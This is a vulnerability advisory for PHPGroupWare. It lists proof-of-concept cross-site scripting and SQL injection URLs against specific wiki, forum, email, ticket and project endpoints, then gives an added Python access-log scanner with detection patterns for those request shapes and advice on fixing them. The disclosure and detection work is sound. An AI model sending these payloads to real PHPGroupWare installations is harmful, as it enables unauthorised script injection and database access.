PHPGroupWare Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
An exploit is not required. The following proof of concept examples are available:

Cross-site scripting:

http://www.example.com/phpgroupware/wiki/index.php?kp3=99884d8a63791f406585913d74476b11%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.post&type=new%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=202%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&forum_id=3%22%3E%3Ciframe%3E&msg=202
http://www.example.com/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=42&pos=10%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=preferences.uicategories.index&cats_app=%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=preferences.uicategories.edit&cats_app=notes&extra=&global_cats=True&cats_level=True&cat_parent=188&cat_id=188%22%3E%3Ciframe%3E
http://www.example.com/phpgroupware/index.php?menuaction=email.uimessage.message&msgball[msgnum]=1%22%3E%3Ciframe%3E&msgball[folder]=INBOX.hello&msgball[acctnum]=0&sort=1&order=1&start=0
http://www.example.com/phpgroupware/index.php?menuaction=email.uicompose.compose&fldball[folder]=INBOX.hello&fldball[acctnum]=0&to=%22%3E%3Ciframe%3E&personal=&sort=1&order=1&start=0
http://www.example.com/phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Ciframe%3E

SQL Injection:

http://www.example.com/phpgroupware/tts/viewticket_details.php?ticket_id=355[SQL_QUERY]
http://www.example.com/phpgroupware/index.php?menuaction=todo.ui.show_list&order=[SQL_QUERY]&sort=ASC&filter=&qfield=&start=&query=
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.list_projects&order=[SQL_QUERY]&sort=ASC&filter=&qfield=&start=&query=&pro_main=&action=mains
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.edit_project&pro_main=31&action=subs&project_id=32[SQL_QUERY]
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.edit_project&pro_main=31[SQL_QUERY]&action=subs&project_id=32
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.view_project&pro_main=31&action=subs&project_id=32[SQL_QUERY]&domain=default
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojects.view_project&pro_main=31[SQL_QUERY]&action=subs&project_id=32&domain=default&494fbb
http://www.example.com/phpgroupware/index.php?menuaction=projects.uiprojecthours.view_hours&project_id=32&pro_parent=&action=subs&hours_id=26[SQL_QUERY]&domain=default
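The proof-of-concept URLs above share two request shapes: a quoted value closed with `%22%3E` so that an injected tag (`%3Ciframe%3E`) lands outside the HTML attribute, and a sort column or record id (`order`, `ticket_id`, `project_id`, ...) that is not a bare identifier or integer. The following access-log scanner is an added example written for this page; it is not part of the advisory and not PHPGroupWare code. The parameter names are taken from the advisory's URLs, the log lines are constructed, and the malicious sample values reuse only the advisory's own `%22%3E%3Ciframe%3E` payload and its `[SQL_QUERY]` placeholder.

```python
# Added defensive example (not part of the advisory): flag web-server requests that
# carry the two request shapes the advisory's proof-of-concept URLs use, so that
# attempts against the listed PHPGroupWare endpoints show up in access logs.
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters in which the advisory's SQL injection URLs place [SQL_QUERY]: sort
# columns and numeric record ids. The names are taken from the advisory's URLs.
SORT_PARAMS = {"order", "sort"}
ID_PARAMS = {"ticket_id", "project_id", "pro_main", "hours_id", "cat_id", "cat_parent"}

# Attribute breakout as in %22%3E%3Ciframe%3E: a quote, '>', then the start of a tag.
XSS_RE = re.compile(r'["\']\s*>\s*<\s*[A-Za-z]')
# A legitimate sort column or direction is a bare identifier (e.g. todo_id, ASC, 1).
IDENT_RE = re.compile(r'^[A-Za-z0-9_.]+$')
# A legitimate record id is a plain non-negative integer.
INT_RE = re.compile(r'^\d+$')


def classify_request(url):
    """Return a list of (finding, parameter, decoded value) for one request URL.

    Accepts either a full URL or the request-target as it appears in an access log.
    """
    query = urlsplit(url).query
    findings = []
    # parse_qsl percent-decodes keys and values once, so %22%3E becomes ">.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if XSS_RE.search(value):
            findings.append(("xss-attribute-breakout", key, value))
        elif key in SORT_PARAMS and value and not IDENT_RE.match(value):
            findings.append(("sqli-sort-param", key, value))
        elif key in ID_PARAMS and value and not INT_RE.match(value):
            findings.append(("sqli-id-param", key, value))
    return findings


# Combined log format: client identity user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def scan_access_log(lines):
    """Run classify_request over access-log lines; return one alert dict per finding."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line this scanner understands; skip it
        client, timestamp, target, status = match.groups()
        for finding, key, value in classify_request(target):
            alerts.append({
                "client": client,
                "time": timestamp,
                "path": target.split("?", 1)[0],
                "status": int(status),
                "finding": finding,
                "param": key,
                "value": value,
            })
    return alerts


# Constructed sample log lines (not real traffic). Lines 1 and 4 are benign; lines
# 2, 3 and 5 reuse the advisory's payload shapes against the advisory's endpoints.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2005:10:01:22 +0000] "GET /phpgroupware/index.php?menuaction=todo.ui.show_list&order=todo_id&sort=ASC HTTP/1.1" 200 4231',
    '10.0.0.9 - - [12/Mar/2005:10:02:07 +0000] "GET /phpgroupware/index.php?menuaction=todo.ui.show_list&order=todo_id%5BSQL_QUERY%5D&sort=ASC HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2005:10:02:41 +0000] "GET /phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Ciframe%3E HTTP/1.1" 200 2048',
    '10.0.0.7 - - [12/Mar/2005:10:03:15 +0000] "GET /phpgroupware/index.php?menuaction=email.uimessage.message&msgball[folder]=INBOX.hello&sort=1&order=1&start=0 HTTP/1.1" 200 3100',
    '10.0.0.9 - - [12/Mar/2005:10:04:03 +0000] "GET /phpgroupware/tts/viewticket_details.php?ticket_id=355%5BSQL_QUERY%5D HTTP/1.1" 500 612',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert["client"], alert["path"], alert["finding"], alert["param"], repr(alert["value"]))
```

Two caveats apply. The XSS pattern only catches the quote-then-tag shape the advisory's URLs use after one round of percent-decoding; the checks on `order` and the id parameters are the stronger signal, because any value that is not an identifier or integer has no legitimate use in those positions. The same two rules are also the fix on the application side: encode every parameter before it is written into an HTML attribute, and accept sort columns and ids only when they match a whitelist of known columns or a plain integer.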